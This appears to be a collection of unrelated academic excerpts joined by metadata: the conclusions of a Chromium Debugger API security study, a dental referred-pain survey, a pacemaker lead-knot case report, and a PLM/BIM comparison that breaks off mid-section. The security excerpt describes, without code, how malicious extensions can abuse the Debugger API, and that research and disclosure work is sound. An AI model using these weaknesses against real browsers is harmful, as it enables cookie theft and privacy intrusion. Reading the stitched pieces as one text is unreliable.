Lack of specifications. While the Chromium Project has public Design Documents for most of its components [15], we could not find the specification for some extension APIs, including the Debugger API. This makes it challenging to independently determine whether a particular browser behavior is a feature or a bug. Thus, we were unsure whether listing and attaching to targets from incognito windows ( §4.1, §4.2) was intended or not until April 2022, when we got confirmation from the Chrome Development Team that it was certainly not intended. Another example is the extensions-on-chrome-urls flag used in both §4.4 and §4.5. While it allows extensions to run on "chrome://" URLs, it also grants the Debugger API access to the "chrome-extension://" scheme. We could not find this behavior documented anywhere. Once again, we are unsure whether this is intentional or not, as the name of the flag does not suggest it will also apply to browser extensions. To make matters worse, to this date we still do not know why the flag was introduced in the first place, as the associated Chromium issue (https://crbug.com/174183) has not yet been made public.
Overpowered APIs. Extensions can control almost every single aspect of the browser through the use of extension APIs. As we demonstrate in this paper, the Debugger API is one of the more powerful ones, if not the most. Some CDP commands can even break basic browser isolation mechanisms ( §4.2). This allows accessing or modifying any cookie stored in the browser without the user being clearly aware of the capabilities of the extension. Additionally, we have shown how targets from incognito windows are not isolated either as the Debugger API can list and attach to them even when the extension has not been granted explicit permission.
Despite the Debugger API being a highly privileged and potentially dangerous capability, the associated risk is not reflected accordingly. We found that all of our attacks violate SR01: when installing an extension that declares the debugger permission, the install prompt merely shows a vague warning informing the user that the extension will have access to the "page debugger backend" (Figure 6). We find this risk communication strategy very inadequate. Other platforms have dealt with apps that abuse powerful permissions in the past. In the case of Android, this was partially addressed by mandatorily locking certain resources behind runtime permissions [4]. Although Chromium extensions have a similar concept called "optional permissions," it is up to developers to use them or to keep requesting a permission at install-time [25].
Another issue with the Debugger API is that users have little control over which targets an extension is allowed to debug. As mentioned in §4.2, users can force a debugging extension to detach from all targets by closing an infobar ( §2.3). Nevertheless, extensions can reattach immediately after. Even if the user becomes aware of this deceptive behavior, there is little they can do to prevent it besides uninstalling the malicious extension. This situation turns the notification infobar into a merely informative mechanism that can be easily defeated by an effectively overpowered extension.
Solutions
We reported all of our findings to Google. The issue related to the attack from §4.1 was flagged as a duplicate of a similar report (https://crbug.com/1236325) filed by another researcher in August 2021, which stayed stale for months until we submitted our own report. We did not know this at the time of reporting. Both this bug and the one we present in §4.3 have already been addressed and fixed by adding appropriate security controls. The different vulnerabilities that enable the attacks from §4.4, §4.5 and part of §4.6 were merged into a single report (https://crbug.com/1276497). The other bug that we reported in relation to §4.6 (https://crbug.com/1301966) was initially considered a security vulnerability but then flagged as "not-a-security-bug," consequently making it public. While the issue remains open, and at some point there was some discussion around preventing sideloaded extensions from attaching to the browser target, no progress has been made since.
Regardless of whether our attacks exploit actual bugs or intended features, it is evident that the Debugger API provides extensions with a wide range of powerful capabilities, and that such privileged capabilities require extensive and effective security controls. At some point during the vulnerability disclosure process, members of the Chromium Team proposed restricting the Debugger API in its entirety to users with developer mode enabled. This was later deemed not ideal, as it would impact legitimate developers. Instead, one strategy we propose for risk reduction is to follow the principle of least privilege and redesign a finer-grained permission system for the Debugger API. Examples of this idea abound in other platforms, including the Linux capabilities introduced in the kernel starting with version 2.2 [49], or the splitting of the location permission in Android into more than one for different purposes. In the case of the Debugger API, having a separate permission for each CDP domain would greatly improve security and reduce the impact of abusive extensions. In fact, this is explicitly advised in the CRX API Security Checklist from the Chromium Security Team [13].
The security principle of Separation of Privilege (i.e., granting access based on meeting multiple independent conditions) can also contribute to risk reduction. Two easy-to-implement additional security checks that could be applied when an extension intends to access the Debugger API are:
• "Trusted" v. "non-trusted" extensions. Chromium can already detect the origin of an extension (e.g., Chrome Web Store, sideloaded). The browser could use this information to restrict certain manifest permissions to "trusted" extensions that are signed or come from a verified distribution platform.
• Asking for user consent at runtime. Instead of just showing a merely informative infobar ( §2.3), we suggest replacing it with a consent dialog asking the user to grant or deny extension attachment requests. A similar approach to put sensitive APIs behind a user gesture permission or a security warning was proposed by a member of the Chromium Development Team.
Regarding the Screen Reader and Perfetto UI extensions, hardcoding the identifier of a privileged subject is not a robust security mechanism and opens backdoors. Perhaps the safest option would be to convert them to internal Chromium components. In doing so, the extra capabilities needed exclusively by these two extensions could be packaged into private extension APIs accessible to them instead of granting access based on a hardcoded credential.
To discern whether potential issues are actually intended features and to ease their assessment, we suggest including the corresponding technical specification alongside code changes. This would make it easier to publicly audit code changes and verify that they comply with the specification. Additionally, having a link between the design and the implementation makes Design Documents easier to find.
Related work
Detecting harmful extensions. Previous research on the web extensions ecosystem has focused on detecting malicious browser extensions (MBE). DeKoven et al. describe a methodology for identifying Facebook users who had MBEs installed in their browser [20], which builds upon the work of Kapravelos et al. in Hulk [45]. Based on it, they were able to label close to 2k malicious Chromium and Firefox extensions and notify their users. Pantelaios et al. used a sample of almost 1M different extension releases to propose a system for detecting malicious updates [60]. Saini et al. introduce attacks where colluding extensions share and access sensitive information without being noticed [67]. Similarly, other works focus instead on extensions intentionally leaking personal data. Chen and Kapravelos developed an automated taint-analysis framework and found that almost 4k extensions downloaded from the Chrome Web Store leaked privacy-sensitive information [11]. Weissbacher et al. propose Ex-Ray, a technique for dynamically detecting browsing history leaks through traffic analysis [78].
Detecting vulnerable extensions. Prior studies looked for browser extensions with bugs that can be exploited by web pages or another extension. Bandhakavi et al. used static analysis to automatically flag potentially vulnerable code in legacy Firefox extensions [6]. Fass et al. improved on this with DOUBLEX, a classifier that managed to accurately detect known flaws on a labeled vulnerable extension dataset [23].
Listing running extensions. Sanchez-Rola et al. used timing side-channel attacks to abuse flaws in the implementation of access control settings in multiple browsers that support extensions [68]. Laperdrix et al. looked at CSS modifications injected into web pages by extensions to fingerprint the set of extensions running in a browser [47]. Starov and Nikiforakis proposed a similar technique in XHOUND, an automated framework that measures changes in the DOM for the same purpose [71].
Analysis of the browser extensions architecture. All the previously mentioned works showcase how powerful extensions are. However, they mainly focus on identifying abusive or abusable extensions, not on discussing the browser extension architecture that enables their behavior. Reeder et al. performed a user study on warning messages displayed by the browser [66]. They found that, while warning design has come a long way, there is still room for improvement as the context of a warning largely influences the resulting outcome.
Conclusions
In this work we presented several attacks that exploit vulnerabilities in the Chromium Debugger API. Our attacks allow a malicious extension to take full control of the browser, access sensitive information, impersonate other extensions, and exploit restricted features not intended to be used by any extension. We demonstrated some of these actions through several PoCs that we made publicly available. Our attacks affect every major Chromium-based browser. We reported our findings to Google, which already fixed some of the vulnerabilities and is addressing the rest at the time of this writing.
Even though inadequate security checks are enablers for some of our attacks, we believe that the Debugger API grants extensions excessive capabilities through just one permission, and that the granting mechanism does not fully convey the risk to the user. We have provided a constructive discussion of the root causes of most of these vulnerabilities and of potential strategies to improve the security of the Debugger API.
"year": 2023,
"sha1": "637950611c48282d99d84cb5df47d54e467491b4",
"oa_license": null,
"oa_url": null,
"oa_status": null,
"pdf_src": "Arxiv",
"pdf_hash": "7cb2ffaee9093b67ba269225fb3cbfa83a2572b3",
"s2fieldsofstudy": [
"Computer Science"
],
"extfieldsofstudy": [
"Computer Science"
]
} |
53483066 | pes2o/s2orc | v3-fos-license | Referred Dental Pain , an Analysis of their Prevalence and Clinical Implication
The study objective was to evaluate the prevalence of referred dental pain (RDP) in a group of Brazilian subjects and to identify possible associations with sex, age, and the presence of periodontal or periapical lesions. A descriptive cross-sectional study was designed: 98 patients between 14 and 64 years old (59 women and 39 men) who consulted for dental pain were evaluated clinically and radiographically to determine the cause of pain, its association with periapical and periodontal lesions, and its possible projection to territories other than its origin. The prevalence of RDP was 31.6%, higher in women (67.74%), though without statistical significance. RDP presented together with a periapical lesion in 45.16% of cases and with a periodontal lesion in 25.8%. There was no relationship between age and the presence of RDP. The high prevalence of RDP found reinforces the need for careful diagnosis of orofacial pain.
INTRODUCTION
Pain in the oral and maxillofacial territory has a great impact on quality of life (Murray et al., 1996). Its management requires an etiological diagnosis, which is not always easy, because painful conditions in this region, particularly those of the teeth, tend to be poorly localized by the patient. In the trigeminal system, the high convergence at the spinal trigeminal nucleus of trigeminal and cervical primary afferent neurons, originating in the pulp, periodontium, oral mucosa, tegument, muscles and joints, has been implicated in the mechanism of referred pain (Sessle et al., 1986; Piovesan et al., 2001; Alburquerque et al., 2008; Dias et al., 2009).
For this reason, referred painful conditions of the teeth may originate in distant territories such as the ear, the muscles of the occipital region, the masticatory muscles, or other teeth (Silverglade, 1980; Zeng, 1980; Capuano et al., 1984; Sulfaro & Gobetti, 1995; Wright, 2000; Abu-Bakra & Jones, 2001). The patient's description of the location of pain should therefore be taken with caution; to reach a proper diagnosis it is recommended that, in addition to the anamnesis, the clinician use tests that include pulp vitality testing and radiographs (Ehrmann, 2002).
Clinical studies have found that pain intensity is strongly associated with the development of referred pain of dental origin, unlike pain duration or quality, an association attributed to mechanisms of hyperexcitability due to central sensitization (Falace et al., 1996). In acute painful conditions of dental origin, high-intensity pain is therefore the most likely to develop into referred pain, which has great clinical implications.
Given the shortage of studies analyzing the prevalence of referred dental pain and the population-specific differences in some pain-associated phenomena (Riley & Gilbert, 2000; Riley et al., 2002), the purpose of this study was to examine the prevalence of this condition in a group of Brazilian subjects and to determine possible associations with sex, age, and the presence of periodontal or periapical lesions.
MATERIAL AND METHOD
This study was carried out at the Emergency Clinic of the Faculty of Dentistry at the Universidad de São Paulo. We performed a cross-sectional study examining the prevalence of pain referred from a tooth. The patients were incident cases who consulted for emergency dental pain between March and July 2008. The inclusion criterion was age over 14 years; seriously ill patients and those with physical, cognitive, or psychological limitations hindering data collection were excluded. Patients were informed of the nature of the study and agreed to participate voluntarily, signing a written consent form. The research was approved by the research ethics committee of the University of São Paulo.
Patients. The sample consisted of 98 patients between 14 and 64 years old (mean 34.38; SD 12.77): 59 women with a mean age of 33.28 years (SD 13.14) and 39 men with a mean age of 36.05 years (SD 12.17).
Evaluation. To determine the tooth causing the pain, patients underwent a clinical and semiological assessment using a series of diagnostic tests, which included visual inspection, palpation, percussion, and sensitivity tests (electric, heat, and cold).
This evaluation was supplemented by a radiographic examination to determine the presence of periapical and periodontal lesions associated with the tooth considered the cause of the pain.
Referred dental pain.
Once the tooth causing the painful condition was determined, the presence of referred dental pain was explored through the history and the clinical examination. Referred dental pain was defined as pain projected to a tooth, or a group of teeth, other than the one considered etiological for the development of the painful condition.
Analysis. The prevalence of referred dental pain was established using SPSS 15.0. Contingency tables were used to analyze the association of this condition with sex and with the presence of periapical and periodontal lesions, and probabilities of clinical relevance were calculated; significance was assessed by means of the non-parametric chi-square test (p < 0.05). The significance of differences in age between patients with and without referred dental pain was assessed using Student's t-test (p < 0.05).
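Although the authors ran their analysis in SPSS 15.0, the 2x2 contingency analysis is easy to reproduce; the sketch below (Python with scipy, chosen here purely for illustration, not a tool used in the study) uses the sex-by-RDP counts reported in the Results.

```python
# Re-computation of the 2x2 sex-by-RDP contingency analysis. The authors
# used SPSS 15.0; scipy is used here purely as an illustration. Counts
# are taken from the Results: 21 of 59 women and 10 of 39 men had RDP.
from scipy.stats import chi2_contingency

#            RDP   no RDP
observed = [[21, 59 - 21],   # women
            [10, 39 - 10]]   # men

chi2, p, dof, expected = chi2_contingency(observed, correction=False)
print(f"chi2 = {chi2:.2f}, dof = {dof}, p = {p:.2f}")
# The test is non-significant at the study's p < 0.05 threshold, matching
# the paper's conclusion that sex and RDP are not associated.
```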
RESULTS
Of the 98 patients, 31 showed referred dental pain, giving a prevalence of 31.6% in this sample; 14 indicated that the pain was projected to the entire dental arcade (14.3%) and 17 that it was projected to a particular tooth (17.3%).
Referred dental pain and sex. In the group presenting referred dental pain, the distribution by sex was 21 women and 10 men; on statistical analysis, however, this difference was not significant (chi-square = 0.3). Calculating probabilities for this sample, the probability that a patient with referred dental pain is a woman was 67.74% (Table I).
Referred dental pain and periapical lesion. Periapical lesions, evaluated radiographically, were found in 39 of the patients studied (39.79%). Of these, 14 had referred pain, corresponding to 14.2% of the total sample and 35.89% of those with a lesion. In the group presenting referred dental pain, the distribution according to the presence or absence of periapical lesions showed that referred pain was more common in subjects without periapical lesions; these differences were not significant (chi-square = 0.46), and therefore no association was found between the presence of a periapical lesion and the presence of referred dental pain.
Calculating probabilities for the sample, we found that the probability that a patient with referred dental pain also had a periapical lesion was 45.16%.
Referred dental pain and periodontal lesions. Radiographic evaluation found 17 subjects with a periodontal lesion, corresponding to 17.3% of the total analyzed, of whom 8 (47%) also presented referred dental pain. The difference between the presence and absence of a periodontal lesion in the group presenting referred dental pain was not significant (chi-square = 0.132). Analyzing the probabilities (Table II), the probability that a patient in the sample presented referred dental pain together with a periodontal lesion was 25.8%.
Referred dental pain and age.
The group presenting referred dental pain had a mean age of 33.48 years (SD 10.96), while the mean age in the group whose pain was not projected to another site was 34.8 years (SD 13.59).
The differences between these groups were not statistically significant (p = 0.63).
DISCUSSION

In this study we found a high prevalence of referred dental pain: in approximately one in three patients who consulted (31.6%), the pain, whose site of origin was established through various diagnostic procedures, was projected to other territories. In all these cases, relying solely on the patient's description of the pain location could generate wrong diagnoses and inappropriate treatments (Ehrmann). The absence of a gold standard for diagnosing and comparing referred dental pain makes it difficult to standardize clinical evaluation procedures, which should be implemented especially in cases where the pain intensity is high (Falace et al.).
The higher prevalence of referred dental pain in women is consistent with studies indicating that women have a higher prevalence of some painful facial conditions (Dannecker et al., 2008) but may report pain in ways that hinder its therapeutic management (Donovan et al., 2008), together with pain-modulation mechanisms that differ between men and women (Quiton & Greenspan, 2007), possibly linked to estrogen receptors in the spinal trigeminal nucleus. This has recently been questioned by authors who found no relationship between the menstrual cycle or use of contraceptives and the sensitivity associated with dental and myofascial pain (Tófoli et al., 2007; Vignolo et al., 2008).
In our sample, the probability of finding referred pain together with a pulpal or periapical lesion was greater than the probability of finding it together with a periodontal lesion, which is interesting to analyze in neurophysiological terms. This may be related to three points: first, the differences between dental and periodontal somatotopy in pain perception; second, the increased probability of sensitization of the system in the case of a periapical lesion, because such a lesion results from a prior pulp injury; third, the presence of proprioceptors in the periodontal tissues, which contribute to better localization of a tooth affected by a periodontal lesion.
Pain of odontogenic origin is semiologically challenging because several aspects of its morphological substrate are very complex. First, there is the high convergence of primary afferent neurons of the trigeminal nerve, which project from various territories onto spinal trigeminal nucleus neurons (Sessle et al.). Second, other nerves, such as the facial, glossopharyngeal, and vagus nerves and the first cervical nerves, which have cutaneous, mucosal, or deep territories, project some of their primary afferents to the spinal trigeminal nucleus (Bowsher, 1979; Myers, 2008). Third, neuromodulation by intercellular diffusion at the level of the spinal nucleus, such as by NO2 associated with NMDA glutamatergic receptor activity, facilitates the emergence of hyperalgesia and the extension of the sensitive fields involved in the localization of pain. Fourth, the poor somatotopy of some structures innervated by the trigeminal system complicates the exact localization of the origin of pain (Bowsher). All these factors make irradiated and referred pain a condition frequently observed in clinical practice.
Table I. Contingency table relating the presence or absence of referred dental pain to the sex of the patient, calculated for the 98 patients who consulted for pain at the dental clinic of the Faculty of Dentistry, Universidad de São Paulo, Brazil.

Table II. Contingency table relating the presence or absence of referred dental pain to the presence of a periapical or periodontal lesion, based on the radiographic evaluation of the same 98 patients.
"year": 2012,
"sha1": "e38015e53c5d680d7669adc5c96d2caa7a4960a0",
"oa_license": "CCBYNC",
"oa_url": "http://www.scielo.cl/pdf/ijodontos/v6n2/art09.pdf",
"oa_status": "GOLD",
"pdf_src": "Anansi",
"pdf_hash": "e38015e53c5d680d7669adc5c96d2caa7a4960a0",
"s2fieldsofstudy": [
"Medicine"
],
"extfieldsofstudy": [
"Medicine"
]
} |
Untying the Knot: A Rare Case of Formation of a Life-Threatening Intracardiac Knot Following the Placement of a Temporary Transvenous Pacemaker
The implantation of a temporary pacemaker lead is a very common procedure performed in most hospitals and is known to be relatively safe, but there can be serious complications in rare circumstances. Complications such as arrhythmias, infection, thromboembolic phenomena, and perforation of the vessel or the heart are extensively described. However, an unusual and life-threatening complication that is not frequently discussed is the formation of intracardiac knots. We present a case of a rare complication of a temporary pacemaker placement with the formation of a knot in the distal lead requiring expert technique for removal.
Introduction
Since the invention of temporary transvenous pacemakers (tTPM), their use for the acute management of bradyarrhythmia has been on the rise. Although useful in the medical management of arrhythmias, the technique is associated with multiple complications, including arrhythmias, infection, thromboembolic phenomena, and perforation of the vessel or the heart [1]. However, distal lead knotting following tTPM placement has not been extensively described. Intracardiac knotting can lead to vascular or valvular injury, pneumothorax, symptomatic loss of pacing or hemodynamic compromise, and difficult lead removal [2].
We present the case of a 59-year-old female with bradyarrhythmia who lost pacing following tTPM placement and was found to have an unusual knot formed at the distal part of the lead. This case highlights an unusual and potentially life-threatening complication of tTPM placement.
Case Presentation
A 59-year-old female presented to the emergency department after a fall from a standing height. She had a past medical history of end-stage renal disease requiring hemodialysis for three years, as well as paroxysmal atrial fibrillation, which was treated with flecainide and Eliquis. Her last echocardiogram showed a moderately dilated left atrium with a normal ejection fraction. She also had a history of deep venous thrombosis and nonobstructive coronary artery disease. The trauma workup was negative. She did not lose consciousness or sustain any injuries. She had missed dialysis the day prior. Initial vitals showed a blood pressure of 76/36 mmHg with a heart rate of 31 bpm. An electrocardiogram revealed a junctional rhythm. Laboratory testing revealed a potassium of 6.6 mmol/L. Preparation for urgent dialysis was made, and cardiology was consulted. However, the patient's heart rate did not improve, with a persistent junctional rhythm raising concern for a high-grade AV block (Figure 1).
FIGURE 1: Electrocardiogram showing the junctional rhythm
A right internal jugular vein transvenous pacemaker was placed. The post-procedure chest x-ray revealed the temporary venous pacer tip overlying the right ventricle with redundancy at the tip (Figure 2). Initial capture was appropriate but was lost shortly thereafter; the temporary wire was retracted with the plan to replace it, but there was resistance upon removal. Vascular surgery was consulted, and a buddy guidewire was placed through the sheath, which was then removed to protect the access; subsequently, the transvenous pacing wire was manipulated and removed, revealing a knot in the distal tip. The patient's rhythm subsequently improved after consecutive dialysis sessions, and she was discharged from the hospital to a skilled nursing facility.
FIGURE 2: A chest radiograph with an arrow showing a distal knot in the pacemaker lead
The image shows an anteroposterior radiograph with a left subclavian vas-cath. The right internal jugular temporary transvenous pacemaker lead with a distal knot is highlighted by the blue arrow.
Discussion
In the late 19th century, pulsed electrical stimulation of the heart was first described by J. A. McWilliam, who proposed pacing the ventricles using a flexible wire electrode. Continuous evolution of the technology led to the first pacemaker device, built by the American scientist Albert Hyman in 1932. In the late 1950s, Seymour Furman and John Schwedel introduced a novel technique whereby endocardial stimulation was provided through a lead inserted via the internal jugular vein [3]. Since then, temporary pacing has become a commonly performed procedure in most hospitals, with indications for its use well established by the governing national cardiology colleges [4].
Pacemakers work by electrically stimulating the myocardium, thereby increasing the heart rate in bradyarrhythmia or, in some special cases, preventing or treating tachyarrhythmias, as in circuit entrainment in atrial flutter and ventricular tachycardia. Temporary pacing is usually preferred in an acute situation because of its ease of placement and availability [3]. In pathologies with a temporary disruption of the electrical conduction of the heart, the tTPM serves as a bridge to a permanent device. However, it should be noted that the time to recovery can be lengthy in certain neuromuscular conditions, leading to a prolonged duration of device placement [5].
Numerous complications associated with its placement have been described in the literature; they have generally been classified as (1) complications in establishing access, (2) complications of the catheterization procedure, and (3) complications of catheter residence [6,7]. In a study conducted in 1983 with 1022 patients, there were no reported deaths, and the complication rate was only 13.7%, with pericardial rub being the most frequent complication (5.3%). In contrast, a study performed by Murphy involving 194 patients showed a staggering rate of life-threatening complications, affecting 68 patients (35%), and an unusually high number of deaths, 55 patients (28% of the study population) [7]. This high rate of complications and death was likely attributable to poor technique and to performance of the procedure by poorly skilled personnel [4].
According to the literature, the formation of an intracardiac knot has been widely attributed to poor technique, usually as a result of operator inexperience [7], and to the increased flexibility of the pacemaker lead.
Although the flexibility of the lead is considered advantageous during insertion of the pacemaker, it can be hazardous, since a redundant lead may form loops [1]. The use of a guidewire is usually the first-line and preferred technique when an intracardiac knot occurs; the guidewire is gradually advanced into the catheter until the knot is untied. However, this technique has limitations, as its success depends on the looseness of the knot: if the intracardiac knot is not loose enough and/or is located a long distance from the tip of the catheter, the technique is usually unsuccessful. Another described method involves traction and removal of the catheter through the puncture site; this requires access to both the internal jugular and subclavian veins, thereby increasing the risk of major local complications. Safer combined radiological-percutaneous extraction techniques have been described, especially for cases in which the above-mentioned techniques for untying the knotted catheter fail. The commonly used percutaneous removal method requires replacing the original insertion sheath with an introducer whose diameter is close to that of the knot [8].
Another method, though not widely used, is to untie the knot by holding its distal end with a snare and tugging it back and forth while simultaneously holding its proximal end [9]. Basket retrieval and the use of endomyocardial biopsy forceps are two other methods described [6,9]. If the knot becomes fixated to the myocardium, is too large in size, or has multiple loops, then surgical removal is usually recommended for safer retrieval.
The complication discussed in this case report is easily prevented when the catheter or pacemaker is placed under fluoroscopic guidance, which allows the operator to ensure that an excessive length of catheter is not introduced into the cardiac chamber, thus preventing the catheter from doubling on itself and forming a knot [1].
Conclusions
Although the placement of a tTPM is generally considered a safe procedure, knotting of the lead tip, as shown in this case, should be anticipated, especially following a loss of capture after placement. This can be easily prevented by ensuring that the length of the electrode introduced into the cardiac chamber is not excessive, thereby avoiding loop formation and potential knot formation.
Additional Information

Disclosures
Human subjects: Consent was obtained or waived by all participants in this study. Conflicts of interest: In compliance with the ICMJE uniform disclosure form, all authors declare the following: Payment/services info: All authors have declared that no financial support was received from any organization for the submitted work. Financial relationships: All authors have declared that they have no financial relationships at present or within the previous three years with any organizations that might have an
"year": 2022,
"sha1": "20f842f8ecc7cb6d88b74ae12a660d50c5548934",
"oa_license": "CCBY",
"oa_url": "https://www.cureus.com/articles/130482-untying-the-knot-a-rare-case-of-formation-of-a-life-threatening-intracardiac-knot-following-the-placement-of-a-temporary-transvenous-pacemaker.pdf",
"oa_status": "GOLD",
"pdf_src": "PubMedCentral",
"pdf_hash": "925345dda83d43a2c705bd4e780698761d089459",
"s2fieldsofstudy": [
"Medicine"
],
"extfieldsofstudy": []
} |
Similar Concepts, Distinct Solutions, Common Problems: Learning from PLM and BIM Deployment
This paper describes the similarities and differences between the Product Lifecycle Management and Building Information Modelling concepts, focusing on integration issues relating to their methods, information systems, effects and criticisms. In this literature-based discussion, the authors show that the two concepts share fundamental similarities but are distinct in their scope and level of integration, as well as in the maturity of their process and workflow management. The paper highlights several common problems and aims to provide guidance for deployment initiatives.
Introduction
A variety of lifecycle management concepts enabled by advances in business process integration and information technology (IT) have been developed in various sectors. In manufacturing sectors, Product Lifecycle Management (PLM) has evolved to provide platforms for the creation, organization, and dissemination of product-related knowledge across the extended enterprise [1]. In the construction sector, a renewed focus on lifecycle processes is emerging within the BIM (building information modelling) paradigm, an object-oriented approach to creating, managing and using construction project data. Whilst both are relatively new concepts, PLM stands as the more established approach, seeing steady uptake since the mid-1990s. BIM has only recently become the accepted term for the production and management of a built asset's information throughout design, construction and operations [2]. Recently, comparisons have begun to relate PLM and BIM concepts, contrasting the functionalities and capabilities of their methods and systems (see [3,4,5]). These studies are beginning to examine their similarities and differences; however, a number of open questions remain, relating not only to their concepts, methods, and systems but also to their intended effects and criticisms. In reviewing the literature, the authors present a comparative analysis that explores these questions to provide a broader account of PLM and BIM relative to the unique structural characteristics of each sector. The remainder of the paper is divided into four sections. Sections 2 and 3 review PLM and BIM concepts, information systems, effects and criticisms. Section 4 compares and discusses their main attributes and shared problems, before closing the paper with a discussion and summary of the research contribution.
Product Lifecycle Management

Stark [6] broadly describes PLM as simply the activity of managing products effectively across their lifecycle. Understanding the evolution of PLM helps to expound Stark's definition. Emerging from product data management (PDM), which provides data management capabilities [7,8], PLM extends beyond the engineering aspects of a product to provide a shared platform for the creation, organization, and dissemination of all product-related knowledge across the extended enterprise [1]. PLM is thus a strategic business approach to the collaborative creation, management and exchange of product lifecycle information [9].
Concept and Methods
The general idea behind PLM is to serve up-to-date data, information and knowledge in a secure way to all people who are part of the product lifecycle [10]. Information is produced by a variety of participants at different levels of detail, in diverse functions inside and outside a firm [11]. Complexity increases when moving from data toward knowledge, with data and information being easier to store, describe, and manipulate [1].
The range of data, information and knowledge across an extended enterprise must be integrated correctly throughout the lifecycle. Various methods, systems and engineering tools are required to organize, store, access, convert and exchange these different forms correctly and seamlessly. Consequently, generating appropriate data, information, and knowledge structures is critical [8]. IT infrastructure is therefore central to PLM, including hardware, software, and Internet technologies, and the underlying representation and computing languages. In manufacturing industries, the product lifecycle is typically divided into three distinct phases: beginning/middle/end of life (BOL/MOL/EOL). PLM traverses these phases and assists a corporation and its extended enterprise in meeting functional- and data-level requirements [12]. Together, numerous methods, systems and engineering tools form the systems architecture of a PLM solution. Currently, these are mostly deployed in the BOL phase to support design and development; however, the application of IT in the MOL and EOL phases is increasing as customer needs and technologies mature [10]. PLM functionality is achieved via 'system components', including the IT infrastructure as well as a Product Information Modelling Architecture (PIMA), a Development Toolkit, and a set of Business Applications [11]. PIMA includes product ontology and interoperability standards. A development toolkit provides the means for building Business Applications and extends PLM functions to include kernels (e.g., geometry), visualization tools, data exchange standards and mechanisms, and databases. Business applications provide PLM functionalities to process corporate intellectual capital [11]. There are different types of functional- and data-level requirements of PLM system architectures. According to Jun [12], the functional-level requirements of PLM are defined by the large amounts of structured and unstructured data that are created, updated, transferred, removed, reused and stored in several application systems across the extended enterprise. The requirements for handling this include real-time data acquisition, closed-loop information flow, interoperability between devices and application systems, integration with existing systems and services, and a collaborative environment [12]. Data-level requirements relate to product and product-related data (e.g., business, maintenance and expiration data). For a seamless interface between product and product-related data, the requirements concern the use of standardized data, data interoperability, product information traceability, data encryption, and user authentication [12].
Information Systems and Technologies
Depending on the level of integration, the implementation and the system architecture, the deployed information systems may include: systems engineering (SE), product design, product and portfolio management (PPM), engineering data management (EDM), manufacturing process management (MPM), PDM, enterprise resource planning (ERP) and supply chain management (SCM). To limit the scope of this discussion, our review uses Crnkovic's PLM integration taxonomy [13] to rationalize the information systems utilized. Crnkovic defines three levels of integration: full, loose and no integration.
Full Integration:
A package with all functions using common structures, data, user interfaces and application programming interfaces (APIs). The integration model has a layered architecture: the lowest tier is the data repository layer, which includes databases, file systems and information models [13]; the middle tier is the business layer, with tools and services to support business logic; the uppermost tier is the user interface layer. All layers are connected to each other using standardized APIs. A single database for all data is superior in terms of data quality, because loss of data in exchange between systems is reduced and duplication is low [13].
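As a minimal illustration of this three-tier pattern, the sketch below models a full-integration design in which every tier reads and writes one common information model through explicit APIs. All class and method names are hypothetical, invented for this sketch; they are not taken from any PLM product.

```python
# Hypothetical sketch of Crnkovic's "full integration" pattern [13]: one
# shared data repository tier, a business tier operating on it, and (not
# shown) a user-interface tier calling the business tier through the same
# kind of standardized API. All names are invented for illustration.

class Repository:
    """Data repository tier: the single source of product data."""
    def __init__(self):
        self._records = {}                 # one common information model

    def get(self, item_id):
        return dict(self._records[item_id])

    def put(self, item_id, record):
        self._records[item_id] = dict(record)

class BusinessLayer:
    """Business tier: services implementing business logic."""
    def __init__(self, repo):
        self._repo = repo

    def release_revision(self, item_id):
        record = self._repo.get(item_id)
        record["revision"] += 1            # no export/import step: data
        self._repo.put(item_id, record)    # never leaves the common model
        return record

repo = Repository()
repo.put("PN-001", {"revision": 0, "description": "bracket"})
print(BusinessLayer(repo).release_revision("PN-001"))
```

Because every tier reads and writes the same repository, exchange losses and duplication, the weaknesses of the looser integration levels described next, do not arise.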
Loose Integration: The different information systems operate more independently and store data in their own repositories. The information models in the repositories are different and can only be accessed from native tools. Information exchange between tools is carried out by additional interoperability functions. The advantage is that this does not require a common information model and enables the use of tools from different vendors. The disadvantages stem from the lack of a common information model, which requires interoperability functions, implemented through middleware mechanisms acting as a 'middle layer' in PLM integration. Data inconsistencies pose a risk.
No Integration: All data transfers are done manually, increasing the risk of data inconsistencies and human error, given the lack of standardization in information models. The data update routines, such as import and export functions, need to be well defined.
Effects
As companies use PLM in different ways, the extent of its effects is contingent on the field of business and the level of integration. The business case for PLM is usually linked to the reduction of operational-level information systems and an increase in operational excellence [10]. Manufacturers can speed up the realization of complex products. Product engineers can shorten implementation and engineering change approval cycles across the extended design team. Purchasing agents can work more effectively with suppliers to reuse parts. Executives get a high-level view of all important information, from details of the manufacturing line to parts failure rates culled from warranty data and field information [14]. The effects of PLM may also include staff reductions, data integration, standardization, access to timely and complete information, improved customer service, creative and collaborative work methods, customization of products based on complex customer desires, lead-time reduction, prototype cost reduction, and a reduction in late product changes [10]. PLM centres on the BOM (bill of materials), with methods, processes and legacy tools needing to be modular, follow standards and be reusable [11]. PLM integration must be flexible enough to react to changes in the market, organization structure, business processes, products and tools. Consequently, data, processes and software should ideally be aggregated to reduce system complexity [15]. There are ongoing efforts to make STEP universally available using XML and UML standards. MIMOSA's OSA-EAI (Open System Architecture for Enterprise Application Integration) and OSA-CBM (Open System Architecture for Condition Based Maintenance) are also established and utilised [16].
Criticisms
There are several unique challenges related to business process and technological integration relative to the PLM concept, as documented in several case studies (see e.g., [10,14,15]). Many criticisms of PLM can be traced to: (a) failings in PLM technology; (b) the 'elusive standard engineering process' as the foundation for PLM; (c) organizational issues; and (d) dynamic environments.
Failings of PLM Technology: PLM solutions lack maturity; this is mostly due to high levels of technical complexity and incomplete data standards. Whilst PLM's functional footprint is improving, it is common to require multiple proprietary solutions to address each company's needs spanning the development lifecycle. PLM solutions are typically a complex collection of tools that are often loosely connected [15]. Depending on the overall architecture, the functionalities of systems and tools used might overlap causing redundancies, rework and data quality deterioration. Also, data standards and corporation-wide integration architectures are ongoing development activities and are not fully established [10,15].
Elusive Standard Engineering Process: Whilst the development process may be viewed as standard across product groups and businesses, once the details of how a company actually develops a product are considered (how decisions are made, who is involved at various stages, how partner collaborations are executed, etc.), the nuances of the company's product development practices become visible [15]. The practices of seemingly similar product development and engineering processes can differ wildly across companies and between products developed within the same company.
Organizational Issues: Due to the diversity of engineering tools and subsystems, there is a tendency to delegate PLM deployment to engineering executives, who traditionally manage technology rollouts [15]. This approach works for choosing point solutions, e.g., CAD tools, but studies show that it does not work well for enterprise-wide integration platforms [14,15]. The main criticism is that different business functions generate and deal with product data in disparate ways. Related criticisms include improper executive management expectations, frustrated end-users, high implementation costs, and evasive returns on investment [15].
Dynamic Environments:
